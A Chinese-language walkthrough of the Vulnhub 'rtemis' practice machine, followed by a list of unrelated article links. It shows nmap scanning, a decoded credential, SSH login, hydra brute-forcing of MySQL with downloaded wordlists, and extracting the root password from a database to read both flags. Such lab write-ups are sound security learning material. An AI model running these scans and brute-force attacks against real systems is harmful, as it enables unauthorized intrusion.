Vulnhub实战-rtemis靶机

下载地址:http://www.vulnhub.com/entry/r-temis-1,649/

描述

通过描述我们知道这个靶机有两个flag

主机发现

通过nmap扫描发现主机

nmap -sn 192.168.33.0/24

nmap -sS -p- -v -A 192.168.33.9

我们发现靶机开放的端口如下:

80端口 Apache httpd 2.4.38
3306端口 MySQL 5.7.32
7223端口 OpenSSH 7.9p1 Debian 10+deb10u2

接下来我们访问http服务看看有什么线索!

web服务探测

  1. 访问IP获得如下页面:

  1. 接下来我们目录扫描发现easy.txt文件

  1. 访问easy.txt文件获得如下Brainfuck密码:

解密工具地址:http://www.hiencode.com/brain.html

  1. 通过解密我们获得一对账号密码:

rtemis:t@@rb@ss

尝试主机登录

  1. 通过上面获得的账号密码,我们尝试通过SSH登录靶机

ssh rtemis@192.168.33.9 -p 7223(因为我们上面发现ssh登录端口是7223端口,不是默认的22端口!)

我们发现此时用户是普通用户,我们肯定看不了root文件夹,我们尝试看看home文件夹有什么!

  1. 在home文件夹发现 user.txtpass.txt

  1. 通过hydra暴力破解 mysql 密码

我尝试使用python,发现靶机安装有python3,所以我们可以通过python3开启http服务,讲这两个txt文件下载到本地

靶机: python3 -m http.server 9999

kali: wget http://192.168.33.9:9999/user.txt wget http://192.168.33.9:9999/pass.txt

通过hydra暴力破解mysql密码:

hydra -L /root/user.txt -P /root/pass.txt 192.168.33.9 mysql -t 10

  1. 登录mysql,发现root密码

我们拿到mysql账号和密码之后尝试登录mysql:

mysql -usomu -p

接着我们一步一步发现了root用户的密码:

show databases;

use secret;

show tables;

select * from secret;

拿到root权限

我们拿到root的密码之后,登录root用户 su

然后我们查找flag文件:find / -name flag*

我们发现了两个flag文件。实验结束!!!

最新文章

  1. js格式化日期
  2. JavaScript中sort方法的一个坑(leetcode 179. Largest Number)
  3. 【转】wait,notify,notifyAll,join,yield,sleep的区别和联系
  4. [转] swf文件加密基础
  5. iPad上的Cookie到底有多长?
  6. logback详细配置(三)
  7. 图片(img标签)的onerror事件
  8. MYSQL导入导出.sql文件(转)
  9. eclipse下python的selenium自动化环境的搭建
  10. UILabel自适应高度和自动换行
  11. PHP学习(4)——数据类型
  12. Python——OS模块
  13. 在visual studio code 中配置python以及解决中文乱码问题
  14. Git 撤销所有未提交(Commit)的内容
  15. PHP 中的魔法常数
  16. VMware Workstation下ubuntu虚拟机无法上网连不上网络解决
  17. with as 如何工作
  18. 在一个activity中销毁指定activity
  19. python中类的约束和限制对象添加属性
  20. mysql(5.7.17)字符集设置(character_set/collation)

热门文章

  1. 【Linux】【Commands】基础概念及常用基础命令
  2. 【Spring Framework】Spring 入门教程(一)控制反转和依赖注入
  3. 【JS】枚举类型
  4. 使用wesocket从 rabbitMQ获取实时数据
  5. 工厂为什么要进行计划排产,APS高级计划排程系统的优势作用是什么?
  6. java 多线程 :ThreadLocal 共享变量多线程不同值方案;InheritableThreadLocal变量子线程中自定义值,孙线程可继承
  7. JAVA下划线、驼峰相互转换
  8. 利用免费二维码API自动生成网址图片二维码
  9. UDP&串口调试助手用法(1)
  10. Mac下好用的“visio”之 OmniGraffle Pro